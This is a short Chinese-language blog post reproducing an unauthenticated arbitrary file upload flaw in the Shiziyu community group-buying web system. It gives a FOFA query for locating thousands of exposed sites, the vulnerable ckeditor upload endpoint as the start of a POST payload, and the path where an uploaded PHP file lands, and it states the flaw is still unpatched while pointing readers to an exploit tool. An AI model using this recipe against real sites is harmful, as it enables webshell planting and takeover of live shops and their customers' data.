狮子鱼前台任意文件上传复现
网站系统为狮子鱼社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多。主要用户各种购物,本文主要介绍其中两个文件上传漏洞,漏洞复现以及漏洞工具分享。
FoFa语句
1 | "/seller.php?s=/Public/login" |
Payload
1 | POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1 |
接着在当前路径可以发现上传成功
1 | /Common/image/uploads/163*****365.php |
文中Exp编写关注下方公众号回复“shiziyu”获取
发现目前依旧存在此漏洞,仅限学习研究